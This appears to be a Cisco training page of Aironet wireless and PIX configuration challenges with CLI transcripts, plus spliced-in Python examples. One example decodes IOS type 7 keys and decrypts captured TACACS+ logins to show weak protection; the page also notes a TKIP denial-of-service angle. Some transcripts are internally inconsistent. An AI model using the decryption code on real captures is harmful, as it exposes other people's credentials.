This defines the TKIP MIC-failure hold time, in seconds. The countermeasure is triggered when the access point detects two MIC failures within 60 seconds, after which it blocks all TKIP clients on the interface for the hold-time period. This is the countermeasure the TKIP standard requires, and it also means that an attacker who can inject frames with bad MICs can cause a denial of service for the hold time.

WLCCP Explained
Outline: This challenge involves defining WLCCP (Wireless LAN Context Control Protocol).
Explanation
In large campus networks, mobile nodes must be able to migrate from one access point to another and, if possible, hand their current context from one access point to the next rather than authenticating from scratch.
WLCCP establishes and manages wireless network topologies in a SWAN (Structured Wireless-Aware Network). It securely manages an operational context for mobile clients, typically in a campus-type network. In the registration phase it automatically creates and deletes network links and securely distributes operational context, typically together with Layer 2 forwarding paths.
With WLCCP a single infrastructure node, the wireless domain services (WDS) device, is the central control point within each subnet; access points and mobile nodes register with it and select a parent node giving a least-cost path to the backbone. Infrastructure devices and clients are authenticated against separate AAA lists. An example is
> enable
# config t
(config)# aaa new-model
(config)# aaa authentication login testi group radius
(config)# aaa authentication login testc group radius
(config)# wlccp wds priority 200 interface bvi1
(config)# wlccp authentication-server infrastructure testi
(config)# wlccp authentication-server client any testc
(config-wlccp-auth)# ssid testing

which makes this access point a WDS candidate with priority 200 on BVI1, defines that infrastructure devices are authenticated using the server group testi, and that client devices using the testing SSID are authenticated using the server group testc.

Cisco Wireless Test


Outline
This challenge involves taking a Wireless test.

Cisco Wireless Challenge 77


Outline
This challenge involves the configuration of TACACS+ authentication, authorization and accounting for the Aironet.
Objectives
The objectives of this challenge are to:

Define a host name.
Define AAA.
Define TACACS+ authentication, authorization and accounting for network and exec.

The commands used are:

> en
# config t
(config)# hostname test
(config)# aaa new-model
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+
(config)# aaa accounting exec default start-stop group tacacs+
(config)# aaa accounting network default start-stop group tacacs+

Two points to check before applying this to a real device: add a local fallback method (for example aaa authentication login default group tacacs+ local, with a local user and an enable secret defined), so that an unreachable TACACS+ server does not lock you out; and treat the tacacs-server key as a secret, since it is the only thing protecting the contents of the TACACS+ session and IOS stores it in the configuration either in cleartext or, with service password-encryption, in the reversible type 7 form.


Example
> en
# config t
(config)# hostname test
(config)# aaa new-model
(config)# tacacs-server ?
  administration    Start tacacs+ daemon handling administrative messages
  cache             AAA auth cache default server group
  directed-request  Allow user to specify tacacs server to use with `@server'
  dns-alias-lookup  Enable IP Domain Name System Alias lookup for TACACS servers
  host              Specify a TACACS server
  key               Set TACACS+ encryption key.
  packet            Modify TACACS+ packet options
  timeout           Time to wait for a TACACS server to reply
(config)# tacacs-server host ?
  Hostname or A.B.C.D  IP address of TACACS server
  <cr>
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key ?
  0     Specifies an UNENCRYPTED key will follow
  7     Specifies HIDDEN key will follow
  LINE  The UNENCRYPTED (cleartext) shared key
(config)# tacacs-server key krinkle
(config)# aaa authentication ?
  arap             Set authentication lists for arap.
  attempts         Set the maximum number of authentication attempts
  banner           Message to use when starting login/authentication.
  dot1x            Set authentication lists for IEEE 802.1x.
  enable           Set authentication list for enable.
  eou              Set authentication lists for EAPoUDP
  fail-message     Message to use for failed login/authentication.
  login            Set authentication lists for logins.
  password-prompt  Text to use when prompting for a password
  ppp              Set authentication lists for ppp.
  sgbp             Set authentication lists for sgbp.
  username-prompt  Text to use when prompting for a username
(config)# aaa authentication login ?
  WORD     Named authentication list.
  default  The default authentication list.
(config)# aaa authentication login default ?
  cache       Use Cached-group
  enable      Use enable password for authentication.
  group       Use Server-group
  line        Use line password for authentication.
  local       Use local username authentication.
  local-case  Use case-sensitive local username authentication.
  none        NO authentication.
(config)# aaa authentication login default group ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa authentication login default group tacacs+
(config)# aaa authentication ppp default group tacacs+
(config)# aaa authorization ?
  auth-proxy       For Authentication Proxy Services
  cache            For AAA cache configuration
  commands         For exec (shell) commands.
  config-commands  For configuration mode commands.
  configuration    For downloading configurations from AAA server
  console          For enabling console authorization
  exec             For starting an exec (shell).
  network          For network services. (PPP, SLIP, ARAP)
  reverse-access   For reverse access connections
  template         Enable template authorization
(config)# aaa authorization network ?
  WORD     Named authorization list.
  default  The default authorization list.
(config)# aaa author n d ?
  cache             Use Cached-group
  group             Use server-group.
  if-authenticated  Succeed if user has authenticated.
  local             Use local database.
  none              No authorization (always succeeds).
(config)# aaa author n d g ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa authorization network default group tacacs+
(config)# aaa authorization exec default group tacacs+
(config)# aaa accounting ?
  auth-proxy        For authentication proxy events.
  commands          For exec (shell) commands.
  connection        For outbound connections. (telnet, rlogin)
  delay-start       Delay PPP Network start record until peer IP address is known.
  exec              For starting an exec (shell).
  gigawords         64 bit interface counters to support Radius attributes 52 & 53.
  nested            When starting PPP from EXEC, generate NETWORK records before EXEC-STOP record.
  network           For network services. (PPP, SLIP, ARAP)
  resource          For resource events.
  send              Send records to accounting server.
  session-duration  Set the preference for calculating session durations
  suppress          Do not generate accounting records for a specific type of user.
  system            For system events.
  update            Enable accounting update records.
(config)# aaa accounting exec ?
  WORD     Named Accounting list.
  default  The default accounting list.
(config)# aaa accounting exec default ?
  none        No accounting.
  start-stop  Record start and stop without waiting
  stop-only   Record stop when service terminates.
(config)# aaa accounting exec default start-stop ?
  broadcast  Use Broadcast for Accounting
  group      Use Server-group
(config)# aaa accounting exec default sta group ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa accounting exec default start-stop group tacacs+
(config)# aaa accounting net ?
  WORD     Named Accounting list.
  default  The default accounting list.
(config)# aaa accounting network default ?
  none        No accounting.
  start-stop  Record start and stop without waiting
  stop-only   Record stop when service terminates.
(config)# aaa accounting network default start-stop ?
  broadcast  Use Broadcast for Accounting
  group      Use Server-group
(config)# aaa accounting network default start-stop group ?
  WORD     Server-group name
  radius   Use list of all Radius hosts.
  tacacs+  Use list of all Tacacs+ hosts.
(config)# aaa accounting network default start-stop group tacacs+
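Two things the tacacs-server key ? output above hints at deserve a worked illustration: the 7 (HIDDEN) form is reversible, and the key is all that keeps the TACACS+ body private. The following Python is an added example, not the page's or Cisco's code: it decodes a type 7 string with the published translation table, applies the TACACS+ body obfuscation from RFC 8907 section 4.5 (a chained-MD5 pad XORed over the body) to a constructed PAP authentication START packet, and then shows that anyone holding a copy of the configuration and a packet capture recovers the username and password. The session id, the sample key cisco and the packet contents are constructed for the example.

```python
import hashlib

# Translation string behind IOS "type 7" password hiding; public since the 1990s and used by
# every type-7 decoder. The first two characters of a type-7 string are the decimal offset.
TYPE7_XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

TAC_PLUS_VERSION = 0xC0  # major version 0xC, default minor version 0


def decode_type7(hidden):
    """Recover the cleartext behind 'tacacs-server key 7 <hidden>'."""
    offset = int(hidden[:2])
    data = bytes.fromhex(hidden[2:])
    return bytes(c ^ TYPE7_XLAT[(offset + i) % len(TYPE7_XLAT)]
                 for i, c in enumerate(data)).decode()


def tacacs_pad(session_id, key, version, seq_no, length):
    """RFC 8907 section 4.5 pseudo-pad: MD5_1 = MD5(session_id|key|version|seq_no),
    MD5_n = MD5(session_id|key|version|seq_no|MD5_n-1); concatenated, then truncated."""
    seed = session_id.to_bytes(4, "big") + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(seed + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, seq_no, version=TAC_PLUS_VERSION):
    """Encode or decode a TACACS+ body; XOR with the pad is its own inverse.
    An empty key means TAC_PLUS_UNENCRYPTED_FLAG: the body travels as-is."""
    if not key:
        return bytes(body)
    pad = tacacs_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start(user, password, port=b"tty1", rem_addr=b"10.0.0.5"):
    """Constructed authentication START body for PAP: action LOGIN(1), priv_lvl 1,
    authen_type PAP(2), authen_service LOGIN(1), four length bytes, then the fields;
    for PAP the data field carries the password."""
    header = bytes([1, 1, 2, 1, len(user), len(port), len(rem_addr), len(password)])
    return header + user + port + rem_addr + password


def decrypt_capture(ciphertext, session_id, seq_no, hidden_key):
    """What someone with the running-config and a packet capture can do: undo type 7,
    then strip the pad. session_id and seq_no are read from the cleartext TACACS+ header."""
    key = decode_type7(hidden_key).encode()
    return obfuscate(ciphertext, session_id, key, seq_no)


# Constructed values: the type-7 string is "cisco" hidden at offset 09; the session id is made up.
HIDDEN_KEY = "094F471A1A0A"
SESSION_ID = 0x1A2B3C4D

if __name__ == "__main__":
    body = build_authen_start(b"admin", b"s3cret")
    on_the_wire = obfuscate(body, SESSION_ID, b"cisco", seq_no=1)
    print(on_the_wire.hex())
    print(decrypt_capture(on_the_wire, SESSION_ID, 1, HIDDEN_KEY))
```

Because the pad depends only on the shared key and on header fields sent in the clear, a leaked key decrypts every captured session, past and future; there is no integrity check either. This is why RFC 8907 recommends carrying TACACS+ over a dedicated management network or an encrypted tunnel rather than relying on the obfuscation.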

Cisco Wireless Challenge 78


Outline
This challenge involves the configuration of multiple SSIDs.
Objectives
The objectives of this challenge are to:

Create multiple SSIDs.

The commands used are:


> en
# config t
(config)# dot11 ssid network1
(config-ssid)# mbssid guest-mode
(config-ssid)# exit
(config)# dot11 ssid network2
(config-ssid)# exit
(config)# dot11 ssid network3
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
(config-if)# ssid network1
(config-if)# ssid network2
(config-if)# ssid network3

Each SSID defined this way is open (no authentication and no encryption) until an authentication method and an encryption mode are added to it, as in the earlier challenges.

Example
> en
# config t
(config)# dot11 ssid network1
(config-ssid)# mbssid guest-mode
(config-ssid)# exit
(config)# dot11 ssid network2
(config-ssid)# exit
(config)# dot11 ssid network3
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
(config-if)# ssid network1
(config-if)# ssid network2
(config-if)# ssid network3

Cisco Wireless Challenge 79


Outline
This challenge involves the configuration of multiple SSIDs which are associated with VLANs.
Objectives
The objectives of this challenge are to:

Define sub-interfaces.
Create VLANs.
Define multiple SSIDs.

The commands used are:

> en
# config t
(config)# dot11 ssid network1
(config-ssid)# mbssid guest-mode
(config-ssid)# vlan 1
(config-ssid)# exit
(config)# dot11 ssid network2
(config-ssid)# vlan 2
(config-ssid)# exit
(config)# dot11 ssid network3
(config-ssid)# vlan 3
(config-ssid)# exit
(config)# int d0
(config-if)# mbssid
(config-if)# ssid network1
(config-if)# ssid network2
(config-if)# ssid network3
(config-if)# exit
(config)# int d0.1
(config-if)# encapsulation dot1q 1 native
(config-if)# exit
(config)# int e0.1
(config-if)# encapsulation dot1q 1 native
(config-if)# exit
(config)# int d0.2
(config-if)# encapsulation dot1q 2
(config-if)# exit
(config)# int e0.2
(config-if)# encapsulation dot1q 2
(config-if)# exit
(config)# int d0.3
(config-if)# encapsulation dot1q 3
(config-if)# exit
(config)# int e0.3
(config-if)# encapsulation dot1q 3
(config-if)# exit

Example
> en
# config t
(config)# dot11 ssid network1
(config-ssid)# vlan 1
(config-ssid)# exit
(config)# dot11 ssid network2
(config-ssid)# vlan 2
(config-ssid)# exit
(config)# dot11 ssid network3
(config-ssid)# vlan 3
(config-ssid)# exit
(config)# int d0.1
(config-if)# encapsulation dot1q 1 native
(config-if)# exit
(config)# int e0.1
(config-if)# encapsulation dot1q 1 native
(config-if)# exit
(config)# int d0.2
(config-if)# encapsulation dot1q 2
(config-if)# exit
(config)# int e0.2
(config-if)# encapsulation dot1q 2
(config-if)# exit
(config)# int d0.3
(config-if)# encapsulation dot1q 3
(config-if)# exit
(config)# int e0.3
(config-if)# encapsulation dot1q 3
(config-if)# end

# show vlan
Virtual LAN ID:  1 (IEEE 802.1Q Encapsulation)
   vLAN Trunk Interfaces:   Dot11Radio0.1
                            Virtual-Dot11Radio0.1
   This is configured as native Vlan for the following interface(s) :
   Dot11Radio0
   Virtual-Dot11Radio0
   Protocols Configured:   Address:          Received:   Transmitted:
        Bridging        Bridge Group 1
        Bridging        Bridge Group 1

Virtual LAN ID:  2 (IEEE 802.1Q Encapsulation)
   vLAN Trunk Interfaces:   Dot11Radio0.2
                            Virtual-Dot11Radio0.2
   Protocols Configured:   Address:          Received:   Transmitted:
        Bridging        Bridge Group 2
        Bridging        Bridge Group 2

Virtual LAN ID:  3 (IEEE 802.1Q Encapsulation)
   vLAN Trunk Interfaces:   Dot11Radio0.3
                            Virtual-Dot11Radio0.3
   Protocols Configured:   Address:          Received:   Transmitted:
        Bridging        Bridge Group 2
        Bridging        Bridge Group 2

(per-bridge-group packet counters omitted)


This assigns three VLANs. The first is mapped to the network1 SSID, the second to network2 and the third to network3.
Theory
In the following example VLAN 1 is associated with the SSID Scotland on the first Aironet, Ireland on the second and France on the third. All the nodes which connect to VLAN 1 are part of the same network, even though they connect to different Aironets. The same applies to VLAN 2, where nodes connecting to England, Wales and Germany are in the same network. The key requirement is that the switch supports 802.1Q trunking on the ports that connect to the access points.
An example of trunking on the switch is:
# config t
(config)# vlan 1
(config-vlan)# exit
(config)# vlan 2
(config-vlan)# exit
(config)# int fa0/1
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport trunk native vlan 1
(config-if)# switchport trunk allowed vlan 1,2
(config-if)# switchport mode trunk
(config-if)# switchport nonegotiate
(config-if)# int fa0/2
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport trunk native vlan 1
(config-if)# switchport trunk allowed vlan 1,2
(config-if)# switchport mode trunk
(config-if)# switchport nonegotiate
(config-if)# int fa0/3
(config-if)# switchport trunk encapsulation dot1q
(config-if)# switchport trunk native vlan 1
(config-if)# switchport trunk allowed vlan 1,2
(config-if)# switchport mode trunk
(config-if)# switchport nonegotiate
Diagram has been left out in this version; see the e-Book.
Because VLAN 1 is the native VLAN on both the switch trunks and the access point sub-interfaces, its frames cross the trunk untagged. On a production network choose an otherwise unused VLAN as the native VLAN and keep the management VLAN tagged, so that a client on the native VLAN cannot inject tagged frames into another VLAN (VLAN hopping), and restrict the allowed list to the VLANs actually needed, as above, rather than leaving the default of all VLANs.
When the bridge group is added to the radio port, the following are added automatically:
bridge-group 2 subscriber-loop-control
bridge-group 2 block-unknown-source
no bridge-group 2 source-learning
no bridge-group 2 unicast-flooding
bridge-group 2 spanning-disabled

Cisco Wireless Challenge 80


Outline
This challenge involves defining the precedence of QoS settings. If QoS is enabled, the device queues packets based on the Layer 2 class-of-service value of each packet, which can come from:

Packets already classified. These typically arrive from a QoS-enabled device, such as a switch or router, carry a value in the 802.1p field, and take priority over all other policies.
QoS for wireless phones. This gives wireless phone traffic a higher priority than other traffic. In addition, a QoS Basic Service Set (QBSS) load element can be enabled to advertise channel load information in the beacon and probe response frames, which phones use to choose the access point best able to carry their traffic.

This example shows how to enable IEEE 802.11 phone support with the legacy QBSS Load element:
AP(config)# dot11 phone
Objectives
The objectives of this challenge are to:

Enable IEEE 802.11 phone support for the legacy QBSS load element.

The commands used are:

> en
# config t
(config)# dot11 phone
(config)# int d0
(config-if)# traffic-class best-effort cw-min 4 cw-max 10 fixed-slot 2

Example
> en
# config t
(config)# dot11 phone
(config)# int d0
(config-if)# traffic-class ?
  0            Parameters for priority 0
  1            Parameters for priority 1
  2            Parameters for priority 2
  3            Parameters for priority 3
  4            Parameters for priority 4
  5            Parameters for priority 5
  6            Parameters for priority 6
  7            Parameters for priority 7
  background   Parameters for the background access class
  best-effort  Parameters for the best effort access class
  video        Parameters for the video access class
  voice        Parameters for voice access class
(config-if)# traffic-c best-effort ?
  cw-max      802.11 contention window maximum
  cw-min      802.11 contention window minimum
  fixed-slot  802.11 fixed backoff slot time
  <cr>
(config-if)# traffic-c be cw-min ?
  <0-10>  CwMin will be ( 2 to the power of the entered value ) - 1
(config-if)# traffic-c best cw-min 4 ?
  cw-max      802.11 contention window maximum
  fixed-slot  802.11 fixed backoff slot time
  <cr>
(config-if)# traffic-c best cw-min 4 cw-max ?
  <0-10>  CwMax will be ( 2 to the power of the entered value ) - 1
(config-if)# traffic-c best cw-min 4 cw-max 10 ?
  fixed-slot  802.11 fixed backoff slot time
  <cr>
(config-if)# traffic-c best cw-min 4 cw-max 10 fixed-slot ?
  <0-16>  802.11 fixed backoff slot time
(config-if)# traffic-class best-effort cw-min 4 cw-max 10 fixed-slot 2

This configuration enables 802.11-compliant phone support and configures the best-effort
traffic class with its contention window and fixed-slot backoff values. With these values the
backoff for best-effort traffic waits a minimum of the 802.11 Short Inter-Frame Space time
plus two backoff slots before contending for the channel.
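The arithmetic behind the cw-min, cw-max and fixed-slot values, as an added example that is not part of the NetworkSims page: the contention window is (2 to the power of the entered value) - 1 exactly as the CLI help says, and standard 802.11 binary exponential backoff raises the exponent by one per failed transmission until cw-max is reached. The SIFS and slot durations are assumed 802.11b values, not taken from the page.

```python
"""Contention-window arithmetic behind 'traffic-class ... cw-min/cw-max/fixed-slot'.
Added example; not code from the page."""

# Assumed 802.11b timings (microseconds); the page does not state them.
SIFS_US = 10   # Short Inter-Frame Space
SLOT_US = 20   # backoff slot time


def contention_window(exponent: int) -> int:
    """CW = (2 ** exponent) - 1, as the CLI help text states.
    The CLI only accepts 0-10, so the same range is enforced here."""
    if not 0 <= exponent <= 10:
        raise ValueError(f"cw exponent {exponent} outside 0-10")
    return (1 << exponent) - 1


def backoff_window(cw_min_exp: int, cw_max_exp: int, retry: int) -> int:
    """Contention window in effect after `retry` failed transmissions.
    802.11 binary exponential backoff doubles the window per retry
    (CW' = 2*(CW+1)-1, i.e. exponent + 1), capped at cw-max."""
    if cw_min_exp > cw_max_exp:
        raise ValueError("cw-min must not exceed cw-max")
    if retry < 0:
        raise ValueError("retry count must be >= 0")
    return contention_window(min(cw_min_exp + retry, cw_max_exp))


def minimum_wait_us(fixed_slot: int) -> int:
    """Shortest wait before contending: SIFS plus the configured fixed
    backoff slots (the 'fixed-slot 2' case in the text)."""
    if not 0 <= fixed_slot <= 16:
        raise ValueError("fixed-slot outside 0-16")
    return SIFS_US + fixed_slot * SLOT_US


def max_random_backoff_us(cw_min_exp: int, cw_max_exp: int,
                          retry: int, fixed_slot: int) -> int:
    """Worst-case wait: the fixed minimum plus a full contention window of slots."""
    return (minimum_wait_us(fixed_slot)
            + backoff_window(cw_min_exp, cw_max_exp, retry) * SLOT_US)


if __name__ == "__main__":
    # The page's own setting: cw-min 4, cw-max 10, fixed-slot 2
    print("CWmin =", contention_window(4), "slots, CWmax =", contention_window(10), "slots")
    for r in range(8):
        print(f"after {r} retries: CW = {backoff_window(4, 10, r)} slots")
    print("minimum wait (us):", minimum_wait_us(2))
    print("worst-case first-attempt wait (us):", max_random_backoff_us(4, 10, 0, 2))
```

Lowering cw-min shortens the expected wait for the class, which is how the voice class gets ahead of best-effort; raising cw-max only matters once retries have already doubled the window several times.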


PIX/SPNA

Cisco PIX Challenge 1


Outline
This challenge involves the configuration of basic PIX details.
Objectives
The objectives of this challenge are to:

Setup the hostname.
Define the domain name.
Setup IP address of E0.
Enable E0.

Example (Version 6.x)


# sh ip add
System IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
Current IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
# sh nameif
# config t
(config)# help hos
USAGE:
hostname <name>
show hostname [fqdn]
DESCRIPTION:
hostname        Change host name
(config)# hostname freds
(config)# domain-name fred.com
(config)# help domain
USAGE:
[no] domain-name <name>
clear configure domain-name
DESCRIPTION:
domain-name     Change domain name
(config)# ip address outside 192.168.1.1 255.255.255.0
(config)# interface e0 auto
(config)# exit
# show ip add
# show running
# sh int e0
Interface Ethernet0 outside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Example (Version 7.x)


# sh nameif
# config t
(config)# help hostname
USAGE:
hostname <name>
show hostname [fqdn]
DESCRIPTION:
hostname        Change host name
(config)# help domain
USAGE:
[no] domain-name <name>
clear configure domain-name
DESCRIPTION:
domain-name     Change domain name
(config)# hostname ?
configure mode commands/options:
WORD < 64 char Host name for this system. A hostname must start and end with
a letter or digit and have as interior characters only
letters, digits, or a hyphen.
(config)# hostname freds
(config)# domain-name ?
configure mode commands/options:
WORD Domain names must begin and end with a digit/letter, only letters,
digits, and hyphen are allowed as internal characters, labels are
separated by a dot. A maximum of 63 characters is allowed.
(config)# domain-name fred.com
(config)# int e0
(config-if)# help ip
USAGE:
[no] ip address <ip_address> [<mask>] [standby <sby_ip_addr>]
[no] ip address dhcp [setroute] [retry <4-16>]
show ip address [<interface> | <if_name>]
clear ip
DESCRIPTION:
ip              Set the ip address and mask for an interface
SYNTAX:
<ip_address>    Device's network interface address
<mask>          Netmask of ip_address
<sby_ip_addr>   Device failover peer's network interface address
<4-16>          Number of retries performed by dhcp client, default is 4
<interface>:    Interface hardware name as used by 'interface' command.
                Composed of <type> <port>[/<subif_number>] or
                <type> <slot>/<port>[/<subif_number>]
<if_name>:      Interface name assigned by 'nameif' command
see also:
nameif, security-level
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# help shut
USAGE:
[no] shutdown
DESCRIPTION:
shutdown
Shutdown the selected interface
(config-if)# no shutdown
(config-if)# exit
(config)# exit
# show ip add
# sh ip add
System IP Addresses:
IP address outside 192.168.1.1
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
Current IP Addresses:
IP address outside 0.0.0.0
IP address inside 0.0.0.0
IP address inf2 0.0.0.0
# show running
myPIX # sh int e0
Interface Ethernet0 outside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets
myPIX # sh int e1
Interface Ethernet1 inside, is down, line protocol is down
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 0.0.0.0, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets
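The 7.x example above prints the rules the PIX applies to hostname and domain-name arguments. The following validator, an added example rather than code from NetworkSims, implements those two rules verbatim (hostname shorter than 64 characters, starting and ending with a letter or digit, hyphen only inside; domain name of dot-separated labels with the same shape and at most 63 characters in total) so that a configuration can be checked before it is pushed. The check_config_line helper and the sample lines are constructed for the demonstration.

```python
"""Validator for the PIX 7.x hostname and domain-name rules shown in the
'hostname ?' and 'domain-name ?' help above. Added example, not page code."""
import re

# One label: starts and ends with a letter or digit, hyphens only inside.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?$")


def valid_hostname(name: str) -> bool:
    """'WORD < 64 char': fewer than 64 characters, letter/digit at both ends,
    interior characters letters, digits or hyphen."""
    return len(name) < 64 and bool(_LABEL.match(name))


def valid_domain_name(domain: str) -> bool:
    """Labels separated by a dot, each beginning and ending with a letter or
    digit with only letters, digits and hyphens inside; at most 63 characters."""
    if not 0 < len(domain) <= 63:
        return False
    return all(_LABEL.match(label) for label in domain.split("."))


def check_config_line(line: str) -> tuple[str, bool]:
    """Classify a 'hostname X' or 'domain-name X' config line (constructed
    helper) and report whether the argument satisfies its rule.
    Any other line is reported as ('other', True)."""
    parts = line.strip().split()
    if len(parts) == 2 and parts[0] == "hostname":
        return "hostname", valid_hostname(parts[1])
    if len(parts) == 2 and parts[0] == "domain-name":
        return "domain-name", valid_domain_name(parts[1])
    return "other", True


if __name__ == "__main__":
    # Constructed samples: the page's own values plus deliberately bad ones.
    for sample in ("hostname freds", "domain-name fred.com", "hostname -bad",
                   "hostname my_pix", "domain-name fred..com",
                   "domain-name " + "a" * 64):
        print(f"{sample!r:36} -> {check_config_line(sample)}")
```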

Cisco PIX Challenge 2


Outline
This challenge involves the configuration of basic PIX details.
Objectives
The objectives of this challenge are to:

Define the IP address and subnet mask of E1.
Define the IP address and subnet mask of E2.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# ip address inf2 192.168.1.1 255.255.255.0
(config)# ip address inside 10.0.1.1 255.255.0.0
(config)# interface e1 auto
(config)# interface e2 auto
(config)# exit
# show ip
# show running
# sh int e1
Interface Ethernet1 inside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Example (Ver 7.x)


> enable
# sh nameif
# config t
(config)# int e1
(config-if)# ip address outside 192.168.1.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# int e2
(config-if)# ip address outside 192.168.2.1 255.255.255.0
(config-if)# no shutdown
(config-if)# exit
(config)# exit
# show ip add
# show running
# sh int e1
Interface Ethernet1 inside, is up, line protocol is up
Hardware is i82559, BW 100 Mbps
Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps)
MAC address 000d.6585.77d9, MTU 1500
IP address 192.168.1.1, subnet mask 255.255.255.0
0 packets input, 0 bytes, 0 no buffer
Received 0 broadcasts, 0 runts, 0 giants
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
1 packets output, 64 bytes, 0 underruns
0 output errors, 0 collisions, 0 interface resets
0 babbles, 0 late collisions, 0 deferred
0 lost carrier, 0 no carrier
input queue (curr/max blocks): hardware (128/128) software (0/0)
output queue (curr/max blocks): hardware (0/1) software (0/1)
Received 0 VLAN untagged packets, 0 bytes
Transmitted 1 VLAN untagged packets, 28 bytes
Dropped 0 VLAN untagged packets

Cisco PIX Challenge 3


Outline
This challenge involves the configuration of basic PIX details.
Objectives
The objectives of this challenge are to:

Define the name of each of the interfaces.

Example (Ver 6.x)


> enable
# nameif
# config t
(config)# nameif e0 mars security0
(config)# nameif e1 pluto security100
(config)# nameif e2 jupiter security50
(config)# help username
USAGE:
username <username> {nopassword|password <password>
[encrypted]} [privilege <level>]
no username <name>
[no] username <name> attributes
clear configure username [<name>]
show running-config [all] username [<name> [attributes]]
DESCRIPTION:
username        Configure user authentication local database
SYNTAX:
<username>      The name of the user. A minimum of 4 characters is required.
                A maximum of 64 characters is allowed.
<nopassword>    Indicates that this user has no password
<password>      The password for this user
encrypted       Indicate the <password> entered is encrypted
<level>         The privilege level for this user
attributes      Enter the attributes sub-command mode
(config)# username fred password bert
(config)# exit
# show running

Example (Ver 7.x)


> enable
# nameif
# config t
(config)# int e0
(config-if)# nameif mars
(config-if)# security-level 0
(config-if)# exit
(config)# int e1
(config-if)# nameif pluto
(config-if)# security-level 100
(config-if)# exit
(config)# int e2
(config-if)# help nameif
USAGE:
nameif <if_name>
no nameif [<if_name>]
show running-config [all] nameif [<interface>]
show nameif [<interface>]
clear nameif
DESCRIPTION:
nameif          Assign name to interface
SYNTAX:
<if_name>       A name by which this interface will be referred in all
                other commands
<interface>:    Interface identifier as used in the 'interface' command.
see also:
security-level, interface, static, global, nat
(config-if)# nameif jupiter
(config-if)# help security-level
USAGE:
security-level <0-100>
no security-level [<0-100>]
DESCRIPTION:
security-level  Specify security level of interface
SYNTAX:
<0-100>         The security level of this interface from 0 to 100.
